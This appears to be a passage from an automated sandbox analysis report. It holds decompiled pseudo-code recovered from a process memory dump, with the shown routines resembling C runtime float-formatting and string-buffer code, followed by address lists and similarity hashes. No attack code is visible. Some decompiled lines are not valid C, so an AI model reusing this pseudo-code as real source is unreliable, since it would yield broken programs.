                                                                                                				_t184 = _a8;
                                                                                                				 *_t184 = 0;
                                                                                                				E00F98DED( &_v60, _t167, _a36);
                                                                                                				_t5 = _t180 + 0xb; // 0xb
                                                                                                				_t192 = _a12 - _t5;
                                                                                                				if(_a12 > _t5) {
                                                                                                					_t135 = _a4;
                                                                                                					_t141 = _t135[1];
                                                                                                					_t168 =  *_t135;
                                                                                                					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                                					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                                                						__eflags = _t141;
                                                                                                						if(__eflags > 0) {
                                                                                                							L14:
                                                                                                							_t17 = _t184 + 1; // 0xf9ae1d
                                                                                                							_t169 = _t17;
                                                                                                							_t85 = _a28 ^ 0x00000001;
                                                                                                							_v20 = 0x3ff;
                                                                                                							_v5 = _t85;
                                                                                                							_v40 = _t169;
                                                                                                							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
                                                                                                							__eflags = _t141 & 0x7ff00000;
                                                                                                							_t91 = 0x30;
                                                                                                							if((_t141 & 0x7ff00000) != 0) {
                                                                                                								 *_t184 = 0x31;
                                                                                                								L19:
                                                                                                								_t143 = 0;
                                                                                                								__eflags = 0;
                                                                                                								L20:
                                                                                                								_t25 =  &(_t169[0]); // 0xf9ae1d
                                                                                                								_t185 = _t25;
                                                                                                								_v16 = _t185;
                                                                                                								__eflags = _t180;
                                                                                                								if(_t180 != 0) {
                                                                                                									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
                                                                                                								} else {
                                                                                                									_t95 = _t143;
                                                                                                								}
                                                                                                								 *_t169 = _t95;
                                                                                                								_t97 = _t135[1] & 0x000fffff;
                                                                                                								__eflags = _t97;
                                                                                                								_v24 = _t97;
                                                                                                								if(_t97 > 0) {
                                                                                                									L25:
                                                                                                									_t170 = _t143;
                                                                                                									_t144 = 0xf0000;
                                                                                                									_t98 = 0x30;
                                                                                                									_v12 = _t98;
                                                                                                									_v16 = _t143;
                                                                                                									_v24 = 0xf0000;
                                                                                                									do {
                                                                                                										__eflags = _t180;
                                                                                                										if(_t180 <= 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t123 = E00FB3C20( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
                                                                                                										_t158 = 0x30;
                                                                                                										_t125 = _t123 + _t158 & 0x0000ffff;
                                                                                                										__eflags = _t125 - 0x39;
                                                                                                										if(_t125 > 0x39) {
                                                                                                											_t125 = _t125 + _v32;
                                                                                                											__eflags = _t125;
                                                                                                										}
                                                                                                										_t159 = _v24;
                                                                                                										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
                                                                                                										 *_t185 = _t125;
                                                                                                										_t185 = _t185 + 1;
                                                                                                										_t144 = _t159 >> 4;
                                                                                                										_t98 = _v12 - 4;
                                                                                                										_t180 = _t180 - 1;
                                                                                                										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
                                                                                                										_v24 = _t159 >> 4;
                                                                                                										_v12 = _t98;
                                                                                                										__eflags = _t98;
                                                                                                									} while (_t98 >= 0);
                                                                                                									_v16 = _t185;
                                                                                                									__eflags = _t98;
                                                                                                									if(_t98 < 0) {
                                                                                                										goto L42;
                                                                                                									}
                                                                                                									_t119 = E00FB3C20( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
                                                                                                									__eflags = _t119 - 8;
                                                                                                									if(_t119 <= 8) {
                                                                                                										goto L42;
                                                                                                									}
                                                                                                									_t50 = _t185 - 1; // 0xf9ae1d
                                                                                                									_t120 = _t50;
                                                                                                									_t139 = 0x30;
                                                                                                									while(1) {
                                                                                                										_t153 =  *_t120;
                                                                                                										__eflags = _t153 - 0x66;
                                                                                                										if(_t153 == 0x66) {
                                                                                                											goto L35;
                                                                                                										}
                                                                                                										__eflags = _t153 - 0x46;
                                                                                                										if(_t153 != 0x46) {
                                                                                                											_t135 = _a4;
                                                                                                											__eflags = _t120 - _v40;
                                                                                                											if(_t120 == _v40) {
                                                                                                												_t54 = _t120 - 1;
                                                                                                												 *_t54 =  *(_t120 - 1) + 1;
                                                                                                												__eflags =  *_t54;
                                                                                                											} else {
                                                                                                												__eflags = _t153 - 0x39;
                                                                                                												if(_t153 != 0x39) {
                                                                                                													_t154 = _t153 + 1;
                                                                                                													__eflags = _t154;
                                                                                                												} else {
                                                                                                													_t154 = _v32 + 0x3a;
                                                                                                												}
                                                                                                												 *_t120 = _t154;
                                                                                                											}
                                                                                                											goto L42;
                                                                                                										}
                                                                                                										L35:
                                                                                                										 *_t120 = _t139;
                                                                                                										_t120 = _t120 - 1;
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags =  *_t135 - _t143;
                                                                                                									if( *_t135 <= _t143) {
                                                                                                										L42:
                                                                                                										__eflags = _t180;
                                                                                                										if(_t180 > 0) {
                                                                                                											_push(_t180);
                                                                                                											_t115 = 0x30;
                                                                                                											_push(_t115);
                                                                                                											_push(_t185);
                                                                                                											E00F95A00(_t180);
                                                                                                											_t185 = _t185 + _t180;
                                                                                                											__eflags = _t185;
                                                                                                											_v16 = _t185;
                                                                                                										}
                                                                                                										_t99 = _v40;
                                                                                                										__eflags =  *_t99;
                                                                                                										if( *_t99 == 0) {
                                                                                                											_t185 = _t99;
                                                                                                											_v16 = _t185;
                                                                                                										}
                                                                                                										 *_t185 = (_v5 << 5) + 0x50;
                                                                                                										_t104 = E00FB3C20( *_t135, 0x34, _t135[1]);
                                                                                                										_t186 = 0;
                                                                                                										_t105 = _v16;
                                                                                                										_t148 = (_t104 & 0x000007ff) - _v20;
                                                                                                										__eflags = _t148;
                                                                                                										asm("sbb esi, esi");
                                                                                                										_t63 = _t105 + 2; // 0xf9ae1d
                                                                                                										_t172 = _t63;
                                                                                                										_v40 = _t172;
                                                                                                										if(__eflags < 0) {
                                                                                                											L50:
                                                                                                											_t148 =  ~_t148;
                                                                                                											asm("adc esi, 0x0");
                                                                                                											_t186 =  ~_t186;
                                                                                                											_t136 = 0x2d;
                                                                                                											goto L51;
                                                                                                										} else {
                                                                                                											if(__eflags > 0) {
                                                                                                												L49:
                                                                                                												_t136 = 0x2b;
                                                                                                												L51:
                                                                                                												 *(_t105 + 1) = _t136;
                                                                                                												_t181 = _t172;
                                                                                                												_t106 = 0x30;
                                                                                                												 *_t172 = _t106;
                                                                                                												_t107 = 0;
                                                                                                												__eflags = _t186;
                                                                                                												if(__eflags < 0) {
                                                                                                													L55:
                                                                                                													__eflags = _t181 - _t172;
                                                                                                													if(_t181 != _t172) {
                                                                                                														L59:
                                                                                                														_push(_t136);
                                                                                                														_push(_t107);
                                                                                                														_push(0x64);
                                                                                                														_push(_t186);
                                                                                                														_t108 = E00FB3CF0();
                                                                                                														_t186 = _t136;
                                                                                                														_t136 = _t148;
                                                                                                														_v32 = _t172;
                                                                                                														_t172 = _v40;
                                                                                                														 *_t181 = _t108 + 0x30;
                                                                                                														_t181 = _t181 + 1;
                                                                                                														_t107 = 0;
                                                                                                														__eflags = 0;
                                                                                                														L60:
                                                                                                														__eflags = _t181 - _t172;
                                                                                                														if(_t181 != _t172) {
                                                                                                															L64:
                                                                                                															_push(_t136);
                                                                                                															_push(_t107);
                                                                                                															_push(0xa);
                                                                                                															_push(_t186);
                                                                                                															_push(_t148);
                                                                                                															_t110 = E00FB3CF0();
                                                                                                															_v40 = _t172;
                                                                                                															 *_t181 = _t110 + 0x30;
                                                                                                															_t181 = _t181 + 1;
                                                                                                															_t107 = 0;
                                                                                                															__eflags = 0;
                                                                                                															L65:
                                                                                                															_t149 = _t148 + 0x30;
                                                                                                															__eflags = _t149;
                                                                                                															 *_t181 = _t149;
                                                                                                															 *(_t181 + 1) = _t107;
                                                                                                															_t182 = _t107;
                                                                                                															L66:
                                                                                                															if(_v48 != 0) {
                                                                                                																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
                                                                                                															}
                                                                                                															return _t182;
                                                                                                														}
                                                                                                														__eflags = _t186 - _t107;
                                                                                                														if(__eflags < 0) {
                                                                                                															goto L65;
                                                                                                														}
                                                                                                														if(__eflags > 0) {
                                                                                                															goto L64;
                                                                                                														}
                                                                                                														__eflags = _t148 - 0xa;
                                                                                                														if(_t148 < 0xa) {
                                                                                                															goto L65;
                                                                                                														}
                                                                                                														goto L64;
                                                                                                													}
                                                                                                													__eflags = _t186 - _t107;
                                                                                                													if(__eflags < 0) {
                                                                                                														goto L60;
                                                                                                													}
                                                                                                													if(__eflags > 0) {
                                                                                                														goto L59;
                                                                                                													}
                                                                                                													__eflags = _t148 - 0x64;
                                                                                                													if(_t148 < 0x64) {
                                                                                                														goto L60;
                                                                                                													}
                                                                                                													goto L59;
                                                                                                												}
                                                                                                												_t136 = 0x3e8;
                                                                                                												if(__eflags > 0) {
                                                                                                													L54:
                                                                                                													_push(_t136);
                                                                                                													_push(_t107);
                                                                                                													_push(_t136);
                                                                                                													_push(_t186);
                                                                                                													_t113 = E00FB3CF0();
                                                                                                													_t186 = _t136;
                                                                                                													_t136 = _t148;
                                                                                                													_v32 = _t172;
                                                                                                													_t172 = _v40;
                                                                                                													 *_t172 = _t113 + 0x30;
                                                                                                													_t181 = _t172 + 1;
                                                                                                													_t107 = 0;
                                                                                                													__eflags = 0;
                                                                                                													goto L55;
                                                                                                												}
                                                                                                												__eflags = _t148 - 0x3e8;
                                                                                                												if(_t148 < 0x3e8) {
                                                                                                													goto L55;
                                                                                                												}
                                                                                                												goto L54;
                                                                                                											}
                                                                                                											__eflags = _t148;
                                                                                                											if(_t148 < 0) {
                                                                                                												goto L50;
                                                                                                											}
                                                                                                											goto L49;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L25;
                                                                                                								}
                                                                                                							}
                                                                                                							 *_t184 = _t91;
                                                                                                							_t143 =  *_t135 | _t135[1] & 0x000fffff;
                                                                                                							__eflags = _t143;
                                                                                                							if(_t143 != 0) {
                                                                                                								_v20 = 0x3fe;
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							_v20 = _t143;
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						if(__eflags < 0) {
                                                                                                							L13:
                                                                                                							 *_t184 = 0x2d;
                                                                                                							_t184 = _t184 + 1;
                                                                                                							__eflags = _t184;
                                                                                                							_t141 = _t135[1];
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						__eflags = _t168;
                                                                                                						if(_t168 >= 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						goto L13;
                                                                                                					}
                                                                                                					_t182 = E00FA67BA(_t135, _t141, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
                                                                                                					__eflags = _t182;
                                                                                                					if(_t182 == 0) {
                                                                                                						_t131 = E00FB4160(_t184, 0x65);
                                                                                                						__eflags = _t131;
                                                                                                						if(_t131 != 0) {
                                                                                                							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
                                                                                                							__eflags = _t166;
                                                                                                							 *_t131 = _t166;
                                                                                                							 *((char*)(_t131 + 3)) = 0;
                                                                                                						}
                                                                                                						_t182 = 0;
                                                                                                					} else {
                                                                                                						 *_t184 = 0;
                                                                                                					}
                                                                                                					goto L66;
                                                                                                				}
                                                                                                				_t132 = E00F993BA(_t192);
                                                                                                				_t182 = 0x22;
                                                                                                				 *_t132 = _t182;
                                                                                                				E00F98D8C();
                                                                                                				goto L66;
                                                                                                			}

























































                                                                                                0x00fa649f
                                                                                                0x00fa64aa
                                                                                                0x00fa64af
                                                                                                0x00fa64b1
                                                                                                0x00fa64b1
                                                                                                0x00fa64b5
                                                                                                0x00fa64be
                                                                                                0x00fa64c0
                                                                                                0x00fa64c5
                                                                                                0x00fa64c8
                                                                                                0x00fa64cb
                                                                                                0x00fa64e1
                                                                                                0x00fa64e4
                                                                                                0x00fa64e9
                                                                                                0x00fa64f3
                                                                                                0x00fa64f8
                                                                                                0x00fa654c
                                                                                                0x00fa654e
                                                                                                0x00fa655d
                                                                                                0x00fa6560
                                                                                                0x00fa6560
                                                                                                0x00fa6563
                                                                                                0x00fa6565
                                                                                                0x00fa656c
                                                                                                0x00fa657e
                                                                                                0x00fa6581
                                                                                                0x00fa6586
                                                                                                0x00fa658a
                                                                                                0x00fa658b
                                                                                                0x00fa65ab
                                                                                                0x00fa65ae
                                                                                                0x00fa65ae
                                                                                                0x00fa65ae
                                                                                                0x00fa65b0
                                                                                                0x00fa65b0
                                                                                                0x00fa65b0
                                                                                                0x00fa65b3
                                                                                                0x00fa65b6
                                                                                                0x00fa65b8
                                                                                                0x00fa65c9
                                                                                                0x00fa65ba
                                                                                                0x00fa65ba
                                                                                                0x00fa65ba
                                                                                                0x00fa65cb
                                                                                                0x00fa65d0
                                                                                                0x00fa65d0
                                                                                                0x00fa65d5
                                                                                                0x00fa65d8
                                                                                                0x00fa65e2
                                                                                                0x00fa65e4
                                                                                                0x00fa65e6
                                                                                                0x00fa65eb
                                                                                                0x00fa65ec
                                                                                                0x00fa65ef
                                                                                                0x00fa65f2
                                                                                                0x00fa65f5
                                                                                                0x00fa65f5
                                                                                                0x00fa65f7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa660e
                                                                                                0x00fa6615
                                                                                                0x00fa6619
                                                                                                0x00fa661c
                                                                                                0x00fa661f
                                                                                                0x00fa6621
                                                                                                0x00fa6621
                                                                                                0x00fa6621
                                                                                                0x00fa6627
                                                                                                0x00fa662a
                                                                                                0x00fa662e
                                                                                                0x00fa6630
                                                                                                0x00fa6634
                                                                                                0x00fa6637
                                                                                                0x00fa663a
                                                                                                0x00fa663b
                                                                                                0x00fa663e
                                                                                                0x00fa6641
                                                                                                0x00fa6644
                                                                                                0x00fa6644
                                                                                                0x00fa6649
                                                                                                0x00fa664c
                                                                                                0x00fa664f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6666
                                                                                                0x00fa666b
                                                                                                0x00fa666f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6673
                                                                                                0x00fa6673
                                                                                                0x00fa6676
                                                                                                0x00fa6677
                                                                                                0x00fa6677
                                                                                                0x00fa6679
                                                                                                0x00fa667c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa667e
                                                                                                0x00fa6681
                                                                                                0x00fa6688
                                                                                                0x00fa668b
                                                                                                0x00fa668e
                                                                                                0x00fa66a3
                                                                                                0x00fa66a3
                                                                                                0x00fa66a3
                                                                                                0x00fa6690
                                                                                                0x00fa6690
                                                                                                0x00fa6693
                                                                                                0x00fa669d
                                                                                                0x00fa669d
                                                                                                0x00fa6695
                                                                                                0x00fa6698
                                                                                                0x00fa6698
                                                                                                0x00fa669f
                                                                                                0x00fa669f
                                                                                                0x00000000
                                                                                                0x00fa668e
                                                                                                0x00fa6683
                                                                                                0x00fa6683
                                                                                                0x00fa6685
                                                                                                0x00fa6685
                                                                                                0x00fa65da
                                                                                                0x00fa65da
                                                                                                0x00fa65dc
                                                                                                0x00fa66a6
                                                                                                0x00fa66a6
                                                                                                0x00fa66a8
                                                                                                0x00fa66aa
                                                                                                0x00fa66ad
                                                                                                0x00fa66ae
                                                                                                0x00fa66af
                                                                                                0x00fa66b0
                                                                                                0x00fa66b8
                                                                                                0x00fa66b8
                                                                                                0x00fa66ba
                                                                                                0x00fa66ba
                                                                                                0x00fa66bd
                                                                                                0x00fa66c0
                                                                                                0x00fa66c3
                                                                                                0x00fa66c5
                                                                                                0x00fa66c7
                                                                                                0x00fa66c7
                                                                                                0x00fa66d4
                                                                                                0x00fa66db
                                                                                                0x00fa66e2
                                                                                                0x00fa66e4
                                                                                                0x00fa66ed
                                                                                                0x00fa66ed
                                                                                                0x00fa66f0
                                                                                                0x00fa66f2
                                                                                                0x00fa66f2
                                                                                                0x00fa66f5
                                                                                                0x00fa66f8
                                                                                                0x00fa6704
                                                                                                0x00fa6704
                                                                                                0x00fa6708
                                                                                                0x00fa670b
                                                                                                0x00fa670d
                                                                                                0x00000000
                                                                                                0x00fa66fa
                                                                                                0x00fa66fa
                                                                                                0x00fa6700
                                                                                                0x00fa6700
                                                                                                0x00fa670e
                                                                                                0x00fa670e
                                                                                                0x00fa6711
                                                                                                0x00fa6715
                                                                                                0x00fa6716
                                                                                                0x00fa6718
                                                                                                0x00fa671a
                                                                                                0x00fa671c
                                                                                                0x00fa6746
                                                                                                0x00fa6746
                                                                                                0x00fa6748
                                                                                                0x00fa6755
                                                                                                0x00fa6755
                                                                                                0x00fa6756
                                                                                                0x00fa6757
                                                                                                0x00fa6759
                                                                                                0x00fa675b
                                                                                                0x00fa6760
                                                                                                0x00fa6762
                                                                                                0x00fa6766
                                                                                                0x00fa6769
                                                                                                0x00fa676c
                                                                                                0x00fa676e
                                                                                                0x00fa676f
                                                                                                0x00fa676f
                                                                                                0x00fa6771
                                                                                                0x00fa6771
                                                                                                0x00fa6773
                                                                                                0x00fa6780
                                                                                                0x00fa6780
                                                                                                0x00fa6781
                                                                                                0x00fa6782
                                                                                                0x00fa6784
                                                                                                0x00fa6785
                                                                                                0x00fa6786
                                                                                                0x00fa678f
                                                                                                0x00fa6792
                                                                                                0x00fa6794
                                                                                                0x00fa6795
                                                                                                0x00fa6795
                                                                                                0x00fa6797
                                                                                                0x00fa6797
                                                                                                0x00fa6797
                                                                                                0x00fa679a
                                                                                                0x00fa679c
                                                                                                0x00fa679f
                                                                                                0x00fa67a1
                                                                                                0x00fa67a7
                                                                                                0x00fa67ac
                                                                                                0x00fa67ac
                                                                                                0x00fa67b9
                                                                                                0x00fa67b9
                                                                                                0x00fa6775
                                                                                                0x00fa6777
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6779
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa677b
                                                                                                0x00fa677e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa677e
                                                                                                0x00fa674a
                                                                                                0x00fa674c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa674e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6750
                                                                                                0x00fa6753
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6753
                                                                                                0x00fa671e
                                                                                                0x00fa6723
                                                                                                0x00fa6729
                                                                                                0x00fa6729
                                                                                                0x00fa672a
                                                                                                0x00fa672b
                                                                                                0x00fa672c
                                                                                                0x00fa672e
                                                                                                0x00fa6733
                                                                                                0x00fa6735
                                                                                                0x00fa6737
                                                                                                0x00fa673c
                                                                                                0x00fa673f
                                                                                                0x00fa6741
                                                                                                0x00fa6744
                                                                                                0x00fa6744
                                                                                                0x00000000
                                                                                                0x00fa6744
                                                                                                0x00fa6725
                                                                                                0x00fa6727
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6727
                                                                                                0x00fa66fc
                                                                                                0x00fa66fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa66fe
                                                                                                0x00fa66f8
                                                                                                0x00000000
                                                                                                0x00fa65dc
                                                                                                0x00fa65d8
                                                                                                0x00fa658d
                                                                                                0x00fa6599
                                                                                                0x00fa6599
                                                                                                0x00fa659b
                                                                                                0x00fa65a2
                                                                                                0x00000000
                                                                                                0x00fa65a2
                                                                                                0x00fa659d
                                                                                                0x00000000
                                                                                                0x00fa659d
                                                                                                0x00fa6550
                                                                                                0x00fa6556
                                                                                                0x00fa6556
                                                                                                0x00fa6559
                                                                                                0x00fa6559
                                                                                                0x00fa655a
                                                                                                0x00000000
                                                                                                0x00fa655a
                                                                                                0x00fa6552
                                                                                                0x00fa6554
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa6554
                                                                                                0x00fa6512
                                                                                                0x00fa6517
                                                                                                0x00fa6519
                                                                                                0x00fa6526
                                                                                                0x00fa652d
                                                                                                0x00fa652f
                                                                                                0x00fa653a
                                                                                                0x00fa653a
                                                                                                0x00fa653d
                                                                                                0x00fa653f
                                                                                                0x00fa653f
                                                                                                0x00fa6543
                                                                                                0x00fa651b
                                                                                                0x00fa651b
                                                                                                0x00fa651b
                                                                                                0x00000000
                                                                                                0x00fa6519
                                                                                                0x00fa64cd
                                                                                                0x00fa64d4
                                                                                                0x00fa64d5
                                                                                                0x00fa64d7
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 3213747228-0
                                                                                                • Opcode ID: 86ad5884a066cb36a33f060a14c3df2a836b9cde9df07c0202716fc2c987d45f
                                                                                                • Instruction ID: a46b908dd4bfe235191d335f0f95ea8d9bd7cad62ea9456fda2403a74a5bf2d5
                                                                                                • Opcode Fuzzy Hash: 86ad5884a066cb36a33f060a14c3df2a836b9cde9df07c0202716fc2c987d45f
                                                                                                • Instruction Fuzzy Hash: 40B144B2D102459FDB11CF68C881BAEBBF5EF56350F2C41AAE855EB341DA389D01DB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E00F79920(void* __ebx, void** __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, void* _a12, short _a16) {
                                                                                                				signed int _v4;
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed int _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				short _v26;
                                                                                                				short _v28;
                                                                                                				char _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				int _v52;
                                                                                                				int _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				intOrPtr* _v76;
                                                                                                				long _v80;
                                                                                                				intOrPtr _v92;
                                                                                                				void* __ebp;
                                                                                                				signed int _t94;
                                                                                                				signed int _t95;
                                                                                                				signed int _t99;
                                                                                                				short _t101;
                                                                                                				void* _t110;
                                                                                                				void _t117;
                                                                                                				void* _t118;
                                                                                                				int _t123;
                                                                                                				void* _t127;
                                                                                                				void* _t128;
                                                                                                				long _t130;
                                                                                                				signed int _t132;
                                                                                                				int _t140;
                                                                                                				void* _t143;
                                                                                                				int _t149;
                                                                                                				signed int _t152;
                                                                                                				intOrPtr _t153;
                                                                                                				intOrPtr* _t154;
                                                                                                				void _t156;
                                                                                                				long _t160;
                                                                                                				short _t161;
                                                                                                				signed int _t162;
                                                                                                				void** _t173;
                                                                                                				void** _t174;
                                                                                                				signed int _t176;
                                                                                                				void* _t180;
                                                                                                				signed int _t182;
                                                                                                				signed int _t187;
                                                                                                				void* _t190;
                                                                                                				void* _t197;
                                                                                                				signed int _t198;
                                                                                                				signed int _t199;
                                                                                                				signed short* _t202;
                                                                                                				void* _t204;
                                                                                                				signed int _t208;
                                                                                                				void* _t210;
                                                                                                				void* _t211;
                                                                                                				void* _t213;
                                                                                                				void** _t217;
                                                                                                				unsigned int _t218;
                                                                                                				void* _t219;
                                                                                                				void* _t223;
                                                                                                				signed int _t224;
                                                                                                				void* _t228;
                                                                                                				signed int _t230;
                                                                                                				void* _t231;
                                                                                                
                                                                                                				_t197 = __edi;
                                                                                                				_push(__ecx);
                                                                                                				_t152 = _a4;
                                                                                                				_push(_t223);
                                                                                                				_t217 = __ecx;
                                                                                                				_push(__edi);
                                                                                                				_t160 = __ecx[5];
                                                                                                				_v4 = _t160;
                                                                                                				if(_t152 > _t160) {
                                                                                                					__eflags = _t152 - 0x7ffffffe;
                                                                                                					if(_t152 > 0x7ffffffe) {
                                                                                                						L30:
                                                                                                						E00F71D00(_t152, _t160, _t197, _t217);
                                                                                                						goto L31;
                                                                                                					} else {
                                                                                                						_t208 = _t152 | 0x00000007;
                                                                                                						__eflags = _t208 - 0x7ffffffe;
                                                                                                						if(_t208 <= 0x7ffffffe) {
                                                                                                							_t190 = _t160 >> 1;
                                                                                                							__eflags = _t160 - 0x7ffffffe - _t190;
                                                                                                							if(_t160 <= 0x7ffffffe - _t190) {
                                                                                                								_t127 = _t190 + _t160;
                                                                                                								__eflags = _t208 - _t127;
                                                                                                								_t197 =  <  ? _t127 : _t208;
                                                                                                							} else {
                                                                                                								_t197 = 0x7ffffffe;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t197 = 0x7ffffffe;
                                                                                                						}
                                                                                                						_t10 = _t197 + 1; // 0x7fffffff
                                                                                                						_t128 = _t10;
                                                                                                						__eflags = _t128 - 0x7fffffff;
                                                                                                						if(__eflags > 0) {
                                                                                                							L29:
                                                                                                							E00F72A40(_t152, _t190, _t197, _t223, __eflags);
                                                                                                							goto L30;
                                                                                                						} else {
                                                                                                							_t130 = _t128 + _t128;
                                                                                                							__eflags = _t130 - 0x1000;
                                                                                                							if(_t130 < 0x1000) {
                                                                                                								__eflags = _t130;
                                                                                                								if(_t130 == 0) {
                                                                                                									_t223 = 0;
                                                                                                									__eflags = 0;
                                                                                                								} else {
                                                                                                									_t223 = LocalAlloc(0x40, _t130);
                                                                                                								}
                                                                                                								goto L20;
                                                                                                							} else {
                                                                                                								_t11 = _t130 + 0x23; // 0x80000022
                                                                                                								_t160 = _t11;
                                                                                                								__eflags = _t160 - _t130;
                                                                                                								if(__eflags <= 0) {
                                                                                                									goto L29;
                                                                                                								} else {
                                                                                                									_t143 = LocalAlloc(0x40, _t160);
                                                                                                									__eflags = _t143;
                                                                                                									if(__eflags == 0) {
                                                                                                										L31:
                                                                                                										E00F98D9C(_t152, _t160, _t190, _t197, __eflags);
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										_push(_t223);
                                                                                                										_t224 = _t230;
                                                                                                										_push(0xffffffff);
                                                                                                										_push(0xfb65b8);
                                                                                                										_push( *[fs:0x0]);
                                                                                                										_t231 = _t230 - 0x3c;
                                                                                                										_t94 =  *0xfcf00c; // 0xfd8fa683
                                                                                                										_t95 = _t94 ^ _t224;
                                                                                                										_v36 = _t95;
                                                                                                										_push(_t152);
                                                                                                										_push(_t217);
                                                                                                										_push(_t197);
                                                                                                										_push(_t95);
                                                                                                										 *[fs:0x0] =  &_v32;
                                                                                                										_v80 = _t160;
                                                                                                										asm("movq xmm0, [0xfc76f0]");
                                                                                                										_v92 = _v12;
                                                                                                										_v76 = _a8;
                                                                                                										_t99 =  *0xfc76f8; // 0x0
                                                                                                										_v40 = _t99;
                                                                                                										_v56 = 0;
                                                                                                										_v52 = 0;
                                                                                                										asm("movq [ebp-0x1c], xmm0");
                                                                                                										_v56 = 0;
                                                                                                										_v52 = 7;
                                                                                                										_v72 = 0;
                                                                                                										_v24 = 0;
                                                                                                										_t101 = _a16;
                                                                                                										_t161 = _a12;
                                                                                                										__eflags = _t101;
                                                                                                										if(_t101 != 0) {
                                                                                                											asm("cbw");
                                                                                                											_v26 = _t161;
                                                                                                											_v28 = _t101;
                                                                                                										} else {
                                                                                                											_v28 = _t161;
                                                                                                										}
                                                                                                										_t218 = 0x10;
                                                                                                										while(1) {
                                                                                                											_t198 = _v36;
                                                                                                											_t162 = _v40;
                                                                                                											__eflags = _t218 - _t198 - _t162;
                                                                                                											if(_t218 > _t198 - _t162) {
                                                                                                												_push(0);
                                                                                                												_push(_t218);
                                                                                                												_v72 = 0;
                                                                                                												_push(_v72);
                                                                                                												_push(_t218);
                                                                                                												E00F71940(_t152,  &_v56, _t218);
                                                                                                											} else {
                                                                                                												__eflags = _t198 - 8;
                                                                                                												_t152 = _t162 + _t218;
                                                                                                												_t190 =  >=  ? _v56 :  &_v56;
                                                                                                												_v40 = _t152;
                                                                                                												_t204 = _t190 + _t162 * 2;
                                                                                                												__eflags = _t218;
                                                                                                												if(_t218 != 0) {
                                                                                                													_t176 = _t218 >> 1;
                                                                                                													__eflags = _t176;
                                                                                                													_t123 = memset(_t204, 0, _t176 << 2);
                                                                                                													asm("adc ecx, ecx");
                                                                                                													memset(_t204 + _t176, _t123, 0);
                                                                                                													_t231 = _t231 + 0x18;
                                                                                                												}
                                                                                                												 *((short*)(_t190 + _t152 * 2)) = 0;
                                                                                                											}
                                                                                                											__eflags = _v36 - 8;
                                                                                                											_t106 =  >=  ? _v56 :  &_v56;
                                                                                                											_t199 = E00FA1BBE( >=  ? _v56 :  &_v56, _v40,  &_v32, _v60,  *((intOrPtr*)(_v64 + 8)));
                                                                                                											_t231 = _t231 + 0x14;
                                                                                                											__eflags = _t199;
                                                                                                											if(_t199 != 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t218 = _t218 + _t218;
                                                                                                										}
                                                                                                										__eflags = _v36 - 8;
                                                                                                										_t219 = _a12;
                                                                                                										_t109 =  >=  ? _v56 :  &_v56;
                                                                                                										_t153 = ( >=  ? _v56 :  &_v56) + _t199 * 2;
                                                                                                										_t110 = _a8;
                                                                                                										_v60 = _t153;
                                                                                                										_t201 =  >=  ? _v56 :  &_v56;
                                                                                                										_t202 = ( >=  ? _v56 :  &_v56) + 2;
                                                                                                										_v68 = _t110;
